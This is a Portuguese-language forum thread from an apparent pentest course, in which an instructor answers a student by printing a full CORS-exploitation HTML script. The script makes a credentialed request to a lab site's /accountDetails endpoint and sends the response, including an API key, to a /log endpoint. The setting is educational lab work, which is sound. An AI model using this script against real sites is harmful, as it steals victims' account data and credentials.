Solucionado (ver solução)
Solucionado
(ver solução)
1
resposta

Código html? onde baixar?

Referente ao curso Pentest: investigando vulnerabilidades em um servidor de aplicações web, no capítulo Sobre CORS e atividade Acessando API Key

por Gabriel Pinelli Silva
| 53.5k xp | 19 posts

Esse script em html usado na aula, onde posso baixar? Não encontrei em lugar nenhum

1 resposta
solução!
por Renan Lima
| 2860.1k xp | 5941 posts
Instrutor Scuba Team

Olá, Gabriel.

Tudo bem?

O script é um arquivo chamado cors-lab.html e é usado para fazer uma solicitação à página /accountDetails de um domínio específico. Ele usa a função XMLHttpRequest() para fazer essa solicitação e coleta os dados do usuário que clicar no link, você encontra o código dele aqui: https://cursos.alura.com.br/course/pentest-vulnerabilidades-servidor-aplicacoes-web/task/110203

Aqui está um exemplo de como esse script pode ser:

<html>
<body>
<script>
   var xhrequest = new XMLHttpRequest();
   // Preencha com a URL do seu laboratorio aqui:
   var url = "https://0a1300a304007a54c01661fd00b600e1.web-security-academy.net"

   xhrequest.open('GET', url + "/accountDetails", true);
   xhrequest.withCredentials = true;
   xhrequest.send(null)

   xhrequest.onreadystatechange = function() {
       if (xhrequest.readyState == XMLHttpRequest.DONE){
           fetch("/log?key=" + xhrequest.responseText)
       }
   }
</script>
</body>
</html>

Lembre-se de conferir e substituir a URL pelo endereço que está no seu navegador.

Espero ter ajudado e bons estudos!

Quer mergulhar em tecnologia e aprendizagem?

Receba a newsletter que o nosso CEO escreve pessoalmente, com insights do mercado de trabalho, ciência e desenvolvimento de software